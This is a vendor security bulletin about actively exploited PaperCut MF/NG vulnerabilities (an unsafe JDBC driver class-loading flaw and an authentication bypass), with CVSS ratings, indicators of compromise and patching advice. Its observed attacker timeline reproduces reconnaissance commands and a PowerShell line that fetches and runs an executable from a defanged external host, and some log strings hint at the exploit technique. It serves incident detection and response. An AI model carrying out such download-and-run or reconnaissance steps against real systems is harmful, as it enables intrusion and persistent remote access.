Context
This bulletin relates to PaperCut MF and NG print management software. We’d like to specifically draw this to the attention of PaperCut customers who have on premise MF or NG software that is installed on servers which are exposed to the internet. Most typically this is customers who provide customer printing and deploy payment gateways.
PaperCut first reported that a vulnerability in their MF and NG software was being exploited in the wild on 27th August. Konica Minolta’s action between 27th August and now has focussed on providing customers with advice on remediation measures. This has been via direct contact (telephone and email).
As of today, PaperCut have provided a patch with further remediation, which rolls up the two patches released on 27th and 28thAugust.
This event is continually developing, and whilst Konica Minolta will continue to communicate with our customers you are also advised to regularly review updates from PaperCut here - URGENT Security Advisory: PaperCut NG/MF Security Bulletin (27 Aug 2026) | PaperCut
CVE | Notes | CVSS rating and vector |
CVE-2026-82078Unsafe Dynamic Class Loading in Database Connector | An unsafe dynamic class loading vulnerability exists in the database connection utilities of PaperCut MF and PaperCut NG. The application instantiates database driver classes based on configurable driver names without validating against an allowlist of approved drivers.
| 9.4 (CRITICAL) |
CVE-2026-81578Authentication Bypass | An improper access control vulnerability exists in the web management interface of PaperCut MF and PaperCut NG. Under specific conditions, unauthenticated remote requests targeting administrative functions can trigger backend actions prior to the completion of access validation checks.
| 8.8 (HIGH) |
Indicators of compromise
As previously disclosed, the following may be indicators of compromise.
- Alerts from intrusion-detection, endpoint-security, or network-monitoring tools involving the PaperCut Application Server, particularly suspicious post-exploitation activity from pc-app.exe.
- Missing, unexpectedly truncated, or deleted PaperCut server.log files.
- Any of the following entries in server.log:
ERROR No suitable driver found for jdbc:no:x
ERROR DatabaseUtils - Database error looking up cardID: VALUES CAST
Additional indicators of compromise [updated 30 August 2026, 3:35pm (AEST)]:
We are aware of the following additional indicators of compromise.
- Strings in server.log
- DB URL: jdbc:derby:memory:pwn;create=true
- Database error looking up cardID: VALUES CAST(X'cafebabe
- Database error looking up cardID: VALUES CAST('
- DB URL: jdbc:no:x DB Driver: <5-char random name>
Files written to disk:
• <install>\server\lib\<5-char-name>.class
• <install>\server\data\content\<5-char-name>.cmd
• <install>\server\data\content\<5-char-name>.out
Note that these files may be cleaned up by the attacker as activity progresses, so their absence does not rule out compromise.
As every customer environment is unique, it is difficult to identify a single consistent pattern of post-compromise activity, but observed behaviour includes the pc-app.exe (or pc-app) process launching child shell processes (cmd.exe) and running whoami & ver, with endpoint protection in some cases preventing further execution and isolating the machine.
Where execution was not prevented, the following command sequence was observed, shown as elapsed time from the first command (starting at 00:00:00) rather than wall-clock time (URLs below are defanged with hxxp and [.] to prevent accidental execution; replace with http/. before using in detection tooling or blocklists):
00:00:00 whoami & ver
00:01:19 tasklist
00:04:42 nltest /dclist:
00:06:09 quser & dir c:\users
00:16:07 powershell Invoke-WebRequest -Uri hxxps://sendit[.]sh/Gg7Rp/ace[.]exe -OutFile C:\ProgramData\ace.exe
00:18:07 dir c:\programdata /a
00:19:27 c:\programdata\ace.exe /S
00:21:29 Windows Service "Remote Access Service" installed (SimpleHelp agent, C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\restricted\SimpleService.exe, running as LocalSystem, set to auto-start)
00:21:41 tasklist
00:27:37 powershell Invoke-WebRequest -Uri hxxps://download[.]anydesk[.]com/AnyDesk.exe -OutFile C:\ProgramData\AnyDesk.exe
We recommend checking for the presence of a Windows service named “Remote Access Service” running SimpleService.exe from the path above, and for unexpected AnyDesk installations, as potential indicators of post-compromise remote access tooling.
Important: The absence of the above indicators is not confirmation that a system has not been affected. PaperCut will publish validated, specific indicators and further guidance as soon as they are available.
Remediations
Emergency Patch 3 has been released for v24, v25, and v26 by PaperCut’s emergency response team.
This release addresses two known regressions (SAML and legacy Microsoft SQL Server support) and adds additional hardening and mitigation against potential attack chains.
4.1 Konica Minolta Hosted Customers
Customers whose print servers are hosted by Konica Minolta will be contacted to arrange patching subject to local change control processes and agreement.
4.2 Customers running V24, V25 or V26 on their own infrastructure
Customers who host their own print solution infrastructure are advised to apply the third patch as soon as possible. This is the most expedient method for ensuring your organisation is protected at the earliest opportunity. However, if you require assistance with patching, please log a support ticket to arrange for this to be scheduled.
4.3 Customers running version V23
Please log a support ticket.
4.4 Customers running an unsupported version of PaperCut (below version 23)
Please email U2FsdGVkX1/TwuGO83zL0vXLHDEPmkOk4FacV/UceRqpOJJx5c5kzjOYKsfrUL4m and U2FsdGVkX1+/y4Gmdoa1xWJxe0B2B+xzN4g7qdE4eUBSp+K5K8ivhDdmQ7Q3X8zrFvVLG/bNHYLxjc3XtJPUZg==